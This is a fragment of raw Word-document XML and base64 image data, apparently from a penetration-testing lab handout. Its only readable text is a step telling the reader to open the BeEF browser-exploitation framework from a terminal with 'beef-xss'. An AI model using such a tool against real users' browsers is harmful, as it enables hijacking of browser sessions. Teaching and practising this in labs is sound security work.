                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 50078" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 500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0C42EE82" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="24"/>
        <w:ind w:right="-181"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D2D3130" wp14:editId="69C4B55C">
                <wp:extent cx="5986882" cy="3761715"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="43650" name="Group 43650"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5986882" cy="3761715"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5986882" cy="3761715"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="6272" name="Rectangle 6272"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3950062" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2537C199" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>Open beef from terminal using command</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="6273" name="Rectangle 6273"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2970860" y="0"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="25A52F08"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274" name="Rectangle 6274"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="202692"/>
                            <a:ext cx="422613" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="16A4C8C1" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>beef</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="6275" name="Rectangle 6275"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="316992" y="202692"/>
                            <a:ext cx="81888" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4EE7F1E3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>-</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="6276" name="Rectangle 6276"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="377952" y="202692"/>
                            <a:ext cx="290255" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="71F3CBCC" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>xss</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="6277" name="Rectangle 6277"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5944820" y="3612515"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5844A573"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284" name="Picture 6284"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId132"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="38303" y="388954"/>
                            <a:ext cx="5873750" cy="3303905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="6285" name="Shape 6285"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="25603" y="376255"/>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2D3130" id="Group 43650" o:spid="_x0000_s1367" style="width:471.4pt;height:296.2pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59868,3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05rAkQQAADgTAAAOAAAAZHJzL2Uyb0RvYy54bWzkWG1v2zYQ/j5g&#10;/0HQ98Z6sV4RpxiaNSgwrEHb/QBapixhFCmQdOzs1+/uJMpO4ixuCtTAEiAyJR6Pzz13JO94+X7X&#10;Ce+Oa9MqufDDi8D3uKzUqpXrhf/Xt4/vct8zlskVE0ryhX/Pjf/+6tdfLrd9ySPVKLHi2gMl0pTb&#10;fuE31vblbGaqhnfMXKieS+isle6YhVe9nq0024L2TsyiIEhnW6VXvVYVNwa+Xg+d/hXpr2te2c91&#10;bbj1xMIHbJaemp5LfM6uLlm51qxv2mqEwV6BomOthEknVdfMMm+j2yequrbSyqjaXlSqm6m6bitO&#10;NoA1YfDImhutNj3Zsi63636iCah9xNOr1VZ/3t3o/mt/q4GJbb8GLugNbdnVusNfQOntiLL7iTK+&#10;s14FH5MiT/M88r0K+uIsDbMwGUitGmD+ybiq+f2FkTM38ewBnG0PAWL2HJgf4+Brw3pO1JoSOLjV&#10;Xrta+GmUgSmSdRCpXyB2mFwL7tFXoodkJ7JMaYC3U5mKiwTidWQqLPJ5nCJRk7ms7LWxN1x1HjYW&#10;vgYAFFPs7g9jB1EngpMKiU+pPrZCDL34BVhzuLBld8sdmRZmFOz4balW92Bwo/Q/n2Hp1kJtF74a&#10;Wz6uZpgde31PfJJANC4c19CusXQNbcUHRctrwPPbxqq6JcD72UZg4EEMs5/jyvioK2NkHSGA2192&#10;ZVRkQZ4CAUdCPynmMAUG/jncGTo73oo750fdOXc0nOTOwZFREKVFhANZ6TayeRSl4RndSXD26+X/&#10;vzqTo+6kw+Pk1RmHaQGOxMV5zKd5mOeQf5xrhU47zVtZoelRl9Ixd7pLs6xInndpVARRAqFzLp9O&#10;281b8Wl21KfZd+26cFDO82jYe+M0jBKXI7rNNznvUTptOud2at9WJfyPiT60niS5LxdEMMpuNPdH&#10;Jd1JOjqm/97076Am6Zltl61o7T3VV5CAIih5d9tWmOviy2G+nE+nMgjgvJAtwzc4Wp0kjsP0FN8f&#10;qFmKtsfcFU9hbI+AoTh7VNwcsXkonK5Vtem4tEMlqLkA7Eqapu2N7+mSd0sOSb3+tKJciZXGam6r&#10;BiesYWLM8BHZQQeh3ANDzM/k+HEeB5AuYNWT50VCJu+ziSTP4iyBiKeyCCSLgILstdk+4RqQUBOA&#10;/bQ8Op9Oaiqa0MHTgjkp6YqS1FGVpbh7P0i8krwowj1VURE/oaraDIUROs4VQ1Bqr4ayCL41rlXt&#10;pGti+fSfVT9EOo5Dpdj0oAiasDTg1niAgv0dVEffFEnafUnrJIYY2ssIeSg76cRQGXUOI5yc++1J&#10;96E8lWwQM07C/Q6SB1XJgUwllOHDBGgWxfdkKsgdkikkWh0l8wBDlcH9Sw1riIpOuHqQK4dzrN6G&#10;AMSj3Nh7wZEPIb/wGgpMuAoIaZzR6+UHob07hiUh/aG/CSCI4phh7Y2jgmdHoSgTfcNGXaOacQJS&#10;OWpCSU6XPROYUW01ohlufODeBOx09z4AaRpEsJS003gJt1U04YG12BxOCDQI36icpXsKuJ4hRONV&#10;Et7/HL6T/P7C6+pfAAAA//8DAFBLAwQKAAAAAAAAACEAwIYsiiaMAQAmjAEAFAAAAGRycy9tZWRp&#10;YS9pbWFnZTEuanBn/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQE&#10;BQoHBwYIDAoMDAsKCwsNDhIQDQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIUFRT/2wBDAQMEBAUEBQkF&#10;BQkUDQsNFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT/&#10;wAARCAIeA8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&#10;P/Z5NlAHdVTjvrcxxSecCk3+r/2647SdP1eO8R72G7kg87McYuuYx5cf3/3nP/LSoH8NaxbrZx2s&#10;sxIj/wBI/f8A/LTy5P8A4tKAPRKK4zUNJ1KOMRwGea3352Cc78eX6+ZH/wAtK6yPMcabzvkoAlfp&#10;VE6hawx73mSNN/l/6zitCuK1XRdQnm1VLdVjtpIJJLc+Z8/2h49nH9z/AO2UAdnH90U6uEi0zX0+&#10;2yeYxud5kj/efu5P3vyf+Q62fC+l31ityL+4e558uHzP+edAHRVXe6jieON5EEkn3P8AbqxXJ+Mt&#10;EvNW+zyWO6OSOOf545NjgvHsB/z6UAdZUMkgh/eO+I642603UobiWFFuriL9/wCRsuseX+7j8v8A&#10;9qVHq2k6vqVtd6eEmeLy7gC4+0Y8zf8A6ugDvKKgtv8Aj3j+Ty/k/wBX6VPQBnNrNp9s+x/aoftm&#10;P+PfzBvq/wDwVyuq6bd3ktxbLA8Udxdx3BvA6fu0Ty//AI3VKPRdXW3keOeaG8jcf6xz5b/35P8A&#10;Wf8ATT/yHQB2ccyS/cepq4/+yr2EQRqlzcIpkCP9o2bDvzG8n7z95UFvpeqQw2zeXdSzeenmRyT/&#10;ALv/AK6f6z/P/POgDt6KKKAKiXUUmSrp9/y/+2lI15Gl4kDP+9dN6R1yttoOoRyyMl3Iubu5njjk&#10;EfloX83y3/v5+dKof2PqkMltcul0yp+7MUk+XT95b8J+8/6ZyUAei0Vi6DbzWtpL9qR4i8jukckn&#10;mbE9K2qACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAEpaKKAEopaKACiiigAoo&#10;ooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiii&#10;gAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKA&#10;CiiigAooooAKKKKACiiigAooooA+EvAn7f3j74iWdxd+HvhEmpx28nlyfZ9TeTZ/5Cqxfft7eOLC&#10;2knm+GNmBHH5j41Z/wD41Xzb+zB8RLv4dw2bpO8enSXccl35cf7ySP8A66V69481afxp8N9avo7v&#10;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